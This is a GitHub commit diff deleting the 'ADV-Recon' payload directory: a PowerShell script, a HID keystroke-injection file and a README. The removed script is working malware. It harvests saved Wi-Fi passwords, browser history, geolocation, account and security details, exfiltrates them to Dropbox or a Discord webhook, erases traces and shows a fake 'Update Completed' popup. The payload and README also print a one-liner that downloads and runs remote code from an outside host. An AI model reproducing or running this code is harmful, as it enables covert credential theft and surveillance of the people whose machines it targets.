Delete Payloads/Flip-ADV-Recon directory

I-Am-Jakoby 2023-07-25 16:22:19 -05:00 committed by GitHub
parent 25fcf460e5
commit 7a3a6acbd4
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
3 changed files with 0 additions and 745 deletions


@ -1,588 +0,0 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data.
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
All of the gather information is formatted neatly and output to a file.
That file is then exfiltrated to cloud storage via Dropbox.
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
#>
############################################################################################################################################################
# MAKE LOOT FOLDER, FILE, and ZIP
$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
$FileName = "$FolderName.txt"
$ZIP = "$FolderName.zip"
New-Item -Path $env:tmp/$FolderName -ItemType Directory
############################################################################################################################################################
# Enter your access tokens below. At least one has to be provided but both can be used at the same time.
#$db = ""
#$dc = ""
############################################################################################################################################################
# Recon all User Directories
tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
# Powershell history
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
############################################################################################################################################################
function Get-fullName {
try {
$fullName = (Get-LocalUser -Name $env:USERNAME).FullName
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$email = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GeoLocation = Get-GeoLocation
$GeoLocation = $GeoLocation -split " "
$Lat = $GeoLocation[0].Substring(11) -replace ".$"
$Lon = $GeoLocation[1].Substring(10) -replace ".$"
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String
############################################################################################################################################################
Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name
$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name
If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" }
Else{ $UAC = "Unknown" }
############################################################################################################################################################
$lsass = Get-Process -Name "lsass"
if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."}
else {$lsass = "LSASS is not running as a protected process."}
############################################################################################################################################################
$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name
############################################################################################################################################################
# Get nearby wifi networks
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Get info about pc
# Get IP / Network Info
try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
catch{$computerPubIP="Error getting Public IP"}
try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}
catch{$localIP = "Error getting local IP"}
$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
# Check RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerName = $computerSystem.Name
$computerModel = $computerSystem.Model
$computerManufacturer = $computerSystem.Manufacturer
$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String
$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String
############################################################################################################################################################
$ScheduledTasks = Get-ScheduledTask
############################################################################################################################################################
$klist = klist sessions
############################################################################################################################################################
$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime
############################################################################################################################################################
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250
############################################################################################################################################################
# Get Network Interfaces
$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
############################################################################################################################################################
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250
############################################################################################################################################################
# OUTPUTS RESULTS TO LOOT FILE
$output = @"
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' #
# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| ('\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
Full Name: $fullName
Email: $email
GeoLocation:
Latitude: $Lat
Longitude: $Lon
------------------------------------------------------------------------------------------------------------------------------
Local Users:
$luser
------------------------------------------------------------------------------------------------------------------------------
UAC State:
$UAC
LSASS State:
$lsass
RDP State:
$RDP
------------------------------------------------------------------------------------------------------------------------------
Public IP:
$computerPubIP
Local IPs:
$localIP
MAC:
$MAC
------------------------------------------------------------------------------------------------------------------------------
Computer Name:
$computerName
Model:
$computerModel
Manufacturer:
$computerManufacturer
BIOS:
$computerBIOS
OS:
$computerOs
CPU:
$computerCpu
Mainboard:
$computerMainboard
Ram Capacity:
$computerRamCapacity
Total installed Ram:
$computerRam
Video Card:
$videocard
------------------------------------------------------------------------------------------------------------------------------
Contents of Start Up Folder:
$StartUp
------------------------------------------------------------------------------------------------------------------------------
Scheduled Tasks:
$ScheduledTasks
------------------------------------------------------------------------------------------------------------------------------
Logon Sessions:
$klist
------------------------------------------------------------------------------------------------------------------------------
Recent Files:
$RecentFiles
------------------------------------------------------------------------------------------------------------------------------
Hard-Drives:
$Hdds
COM Devices:
$COMDevices
------------------------------------------------------------------------------------------------------------------------------
Network Adapters:
$NetworkAdapters
------------------------------------------------------------------------------------------------------------------------------
Nearby Wifi:
$NearbyWifi
Wifi Profiles:
$wifiProfiles
------------------------------------------------------------------------------------------------------------------------------
Process:
$process
------------------------------------------------------------------------------------------------------------------------------
Listeners:
$listener
------------------------------------------------------------------------------------------------------------------------------
Services:
$service
------------------------------------------------------------------------------------------------------------------------------
Installed Software:
$software
------------------------------------------------------------------------------------------------------------------------------
Drivers:
$drivers
------------------------------------------------------------------------------------------------------------------------------
"@
$output > $env:TEMP\$FolderName/computerData.txt
############################################################################################################################################################
function Get-BrowserData {
[CmdletBinding()]
param (
[Parameter (Position=1,Mandatory = $True)]
[string]$Browser,
[Parameter (Position=1,Mandatory = $True)]
[string]$DataType
)
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $env:UserName
Browser = $Browser
DataType = $DataType
Data = $_
}
}
}
}
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
############################################################################################################################################################
Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP
# Upload output file to dropbox
function dropbox {
$TargetFilePath="/$ZIP"
$SourceFilePath="$env:TEMP\$ZIP"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $db
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
if (-not ([string]::IsNullOrEmpty($db))){dropbox}
############################################################################################################################################################
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = "$dc"
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
############################################################################################################################################################
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)


@ -1,12 +0,0 @@
REM Title: ADV-Recon
REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
ENTER


@ -1,145 +0,0 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ADV-Recon
A script used to do an advanced level of recon on the target's computer.
Version 2 no longer requires you to host your own version of the script.
Modifying the execution script is the only necessary interaction.
## Description
This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
* Hosts PowerShell Version (to know what commands can be run)
* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
* Whether they are in the Admin group or not
* The email associated with their Microsoft account (for phishing possibilities)
* Other User accounts on their system (for possible privilege escalation)
* Details on their login settings (Ex: Min/Max password age and length)
* How many days since they have changed their password (Max password age - Days since = Opportunity)
* Their GeoLocation (know their approximate where abouts)
* Nearby Wifi Networks (Possible lateral movement)
* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?)
* WLAN Profiles (List of SSIDs and Passwords stored on their PC)
* Network Interfaces (What are they connecting in and out with)
* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
* Local Users (Accounts on system with Username, name associated with microsoft account and SID)
* Information on their hard drives (Indicator of Recon Scope)
* COM and Serial Devices (Is there a device connected you can manipulate?)
* Active TCP Connections (Poor mans Port Scanning)
* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
* Video Card info (how much vroom vroom?)
* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks)
## Getting Started
### Dependencies
* Dropbox or Discord
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
`$dc` is the variable that stores your discord webhook
`$db` is the variable that stores your dropbox token
Fill in either or both of these two methods to exfil your collected data
```
powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
* 0.2
* Added additional data queries
* Optimized output of data
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/I_Am_Jakoby">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/i_am_jakoby/">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>Discord
</td>
<td align="center" width="96">
<a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>TikTok
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>